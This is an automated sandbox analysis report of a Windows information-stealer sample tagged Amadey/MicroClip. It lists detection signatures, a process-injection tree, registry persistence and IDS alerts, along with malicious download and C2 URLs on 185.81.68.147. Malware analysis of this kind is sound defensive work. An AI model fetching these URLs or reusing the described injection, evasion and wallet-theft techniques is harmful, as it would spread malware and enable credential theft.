Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
52kYJGCon6.exe

Overview

General Information

Sample name:52kYJGCon6.exe
renamed because original name is a hash value
Original sample name:f5c5c9d5a779ad7077cca7bef57e94f0.exe
Analysis ID:1580849
MD5:f5c5c9d5a779ad7077cca7bef57e94f0
SHA1:73f95be3fbaa28192d8dfece83f45aec532efff2
SHA256:3eb81910ba96d4c0564298528d93071947f0c4cb7c880ad4c5c31c49a41531b1
Tags:Amadeyexeuser-abuse_ch
Infos:

Detection

MicroClip
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MicroClip
AI detected suspicious sample
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking mutex)
Found hidden mapped module (file has been removed from disk)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Posts data to a JPG file (protocol mismatch)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 52kYJGCon6.exe (PID: 4288 cmdline: "C:\Users\user\Desktop\52kYJGCon6.exe" MD5: F5C5C9D5A779AD7077CCA7BEF57E94F0)
    • svchost.exe (PID: 2520 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • 8D8EBC2422383023011859.exe (PID: 3228 cmdline: "C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe" MD5: F5C5C9D5A779AD7077CCA7BEF57E94F0)
          • svchost.exe (PID: 7124 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • 8D8EBC2422383023011859.exe (PID: 2608 cmdline: "C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe" MD5: F5C5C9D5A779AD7077CCA7BEF57E94F0)
          • svchost.exe (PID: 1272 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • tmp8AEF.exe (PID: 344 cmdline: "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe" MD5: 543FB2FD6424B11D72633914571E016C)
        • tmp8AEF.exe (PID: 1576 cmdline: "C:\Users\user\AppData\Local\Temp\tmp8AEF.exe" MD5: 543FB2FD6424B11D72633914571E016C)
      • tmp1946.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Local\Temp\tmp1946.exe" MD5: 1A477A5659D817B01A50F2A80CB1D76E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\tmp1946.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
  • 0xe8e4f:$s2: ReflectiveLoader@

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
  • 0x392ed:$s2: ReflectiveLoader@
Process Memory Space: explorer.exe PID: 1028JoeSecurity_MicroClipYara detected MicroClipJoe Security
    Process Memory Space: tmp1946.exe PID: 2300JoeSecurity_MicroClipYara detected MicroClipJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.3.explorer.exe.caf63f0.4.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0x36aed:$s2: ReflectiveLoader@
      3.2.explorer.exe.caf63f0.1.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0x37eed:$s2: ReflectiveLoader@
      3.2.explorer.exe.caf63f0.1.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0x36aed:$s2: ReflectiveLoader@
      3.2.explorer.exe.8b70535.0.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0x37eed:$s2: ReflectiveLoader@
      3.3.explorer.exe.caf63f0.3.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0x37eed:$s2: ReflectiveLoader@
      Click to see the 9 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: CurrentVersion Autorun Keys Modification
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\52kYJGCon6.exe, ProcessId: 4288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
      Sigma detected: Uncommon Svchost Parent Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\52kYJGCon6.exe", ParentImage: C:\Users\user\Desktop\52kYJGCon6.exe, ParentProcessId: 4288, ParentProcessName: 52kYJGCon6.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 2520, ProcessName: svchost.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\52kYJGCon6.exe", ParentImage: C:\Users\user\Desktop\52kYJGCon6.exe, ParentProcessId: 4288, ParentProcessName: 52kYJGCon6.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 2520, ProcessName: svchost.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:05:06.143606+010020197142Potentially Bad Traffic192.168.2.549708185.81.68.14780TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:05:06.143606+010028032702Potentially Bad Traffic192.168.2.549708185.81.68.14780TCP
      2024-12-26T12:05:18.248270+010028032702Potentially Bad Traffic192.168.2.549716185.81.68.14780TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-26T12:05:45.257802+010028438561A Network Trojan was detected192.168.2.549808185.81.68.14780TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://185.81.68.147/psw.exeAvira URL Cloud: Label: phishing
      Source: http://185.81.68.147/data.phpAvira URL Cloud: Label: phishing
      Source: http://185.81.68.147/gg.phpAvira URL Cloud: Label: phishing
      Source: http://185.81.68.147/zx.exeAvira URL Cloud: Label: phishing
      Source: http://185.81.68.147/TT.exeAvira URL Cloud: Label: malware
      Source: http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAgAvira URL Cloud: Label: phishing
      Source: http://185.81.68.147/gg.phptmUPAvira URL Cloud: Label: phishing
      Source: http://185.81.68.147/gg.phpdbAvira URL Cloud: Label: phishing
      Source: http://185.81.68.147/gg.phpReflectiveLoaderAvira URL Cloud: Label: phishing
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeReversingLabs: Detection: 52%
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeReversingLabs: Detection: 26%
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeReversingLabs: Detection: 65%
      Multi AV Scanner detection for submitted file
      Source: 52kYJGCon6.exeReversingLabs: Detection: 65%
      Source: 52kYJGCon6.exeVirustotal: Detection: 46%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
      Machine Learning detection for sample
      Source: 52kYJGCon6.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839323F0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,11_2_00007FF6839323F0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68390CC50 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,11_2_00007FF68390CC50
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683938FD0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,11_2_00007FF683938FD0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683938F40 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,11_2_00007FF683938F40
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683938EC0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,11_2_00007FF683938EC0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683937660 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,11_2_00007FF683937660
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683937650 CryptHashData,11_2_00007FF683937650
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839375D0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,11_2_00007FF6839375D0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683937B50 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,11_2_00007FF683937B50
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683931AA0 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,CertFreeCertificateContext,11_2_00007FF683931AA0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683931EC0 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,11_2_00007FF683931EC0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683939F20 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,11_2_00007FF683939F20
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: -----BEGIN PUBLIC KEY-----11_2_00007FF6838E7930
      Source: tmp1946.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: mov dword ptr [rbp+04h], 424D53FFh11_2_00007FF683922B10
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile created: C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\miniwallet.bundle.js.LICENSE.txtJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile created: C:\Users\user\AppData\Local\A35B7AD252242051504221\File_Grabber\notification_fast.bundle.js.LICENSE.txtJump to behavior
      Source: 52kYJGCon6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252606142.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252934104.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.6.dr
      Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2d-lb source: tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248974675.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ucrtbase.pdb source: tmp8AEF.exe, 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp, ucrtbase.dll.6.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249958467.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248657749.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251720235.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252310432.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2253222483.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: tmp8AEF.exe, 00000009.00000002.2286471285.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmp, _ctypes.pyd.6.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249383761.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251941372.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.6.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251543551.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252213246.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.6.dr
      Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*e*1bUzbt source: tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDD54000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248762279.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: vcruntime140.amd64.pdbGCTL source: tmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2286668785.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp, VCRUNTIME140.dll.6.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250274909.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248420271.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248862487.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252122918.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.6.dr
      Source: Binary string: .PdB] source: tmp8AEF.exe.2.dr
      Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, select.pyd.6.dr
      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250489173.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.6.dr
      Source: Binary string: ucrtbase.pdbUGP source: tmp8AEF.exe, 00000009.00000002.2286113655.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp, ucrtbase.dll.6.dr
      Source: Binary string: vcruntime140.amd64.pdb source: tmp8AEF.exe, 00000006.00000003.2247224120.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000009.00000002.2286668785.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp, VCRUNTIME140.dll.6.dr
      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2253847052.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249252254.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251634380.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.6.dr
      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250150623.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2248544698.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252025674.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: tmp8AEF.exe, 00000009.00000002.2285358677.00007FF8A8DFD000.00000002.00000001.01000000.0000000A.sdmp
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252744243.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249846119.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.6.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: tmp8AEF.exe, 00000006.00000003.2250404359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.6.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250054696.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2255160433.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250601167.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2251816746.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2250735702.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249118850.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252826757.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249752086.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2249568887.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.6.dr
      Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.6.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2252448737.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.6.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: tmp8AEF.exe, 00000006.00000003.2253312352.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF7CA7979B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7985A0 FindFirstFileExW,FindClose,6_2_00007FF7CA7985A0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 6_2_00007FF7CA7B0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF7CA7B0B84
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7985A0 FindFirstFileExW,FindClose,9_2_00007FF7CA7985A0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7B0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_00007FF7CA7B0B84
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF7CA7979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,9_2_00007FF7CA7979B0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,9_2_00007FF8B837303C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: 9_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,9_2_00007FF8B8373280
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683970138 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF683970138
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839706C8 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,11_2_00007FF6839706C8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF6839709A4 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,FindClose,11_2_00007FF6839709A4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF68396DDD8 wsprintfW,FindFirstFileW,wsprintfW,PathFindExtensionW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,wsprintfW,FindNextFileW,FindClose,11_2_00007FF68396DDD8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: 11_2_00007FF683961B60 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00007FF683961B60
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\AcrobatJump to behavior
